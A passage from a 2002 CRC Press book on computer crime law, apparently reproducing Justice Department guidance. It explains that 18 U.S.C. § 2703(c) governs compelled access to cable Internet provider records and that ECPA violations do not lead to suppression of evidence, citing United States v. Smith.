Cover art courtesy of Greg Kipper.
[…] service. This approach would frustrate the design of both the Cable Act and
ECPA to establish uniform national standards for each type of service. Accord-
ingly, 18 U.S.C. § 2703(c) governs compelled access to records belonging to
cable Internet providers, rather than 47 U.S.C. § 551(h).
Prosecutors and agents who encounter this issue can contact the Computer
Crime and Intellectual Property Section at (202) 514-1026 or their local CTC
for additional advice.
©2002 CRC Press LLC
H. Remedies
1. Suppression
ECPA does not provide a suppression remedy. See 18 U.S.C. § 2708 (“The
[damages] remedies and sanctions described in this chapter are the only judicial
remedies and sanctions for nonconstitutional violations of this chapter.”).
Accordingly, nonconstitutional violations of ECPA do not result in suppression
of the evidence. See United States v. Smith, 155 F.3d 1051, 1056 (9th Cir. 1998)
(“[T]he Stored Communications Act expressly rules out exclusion as a remedy”);
United States v.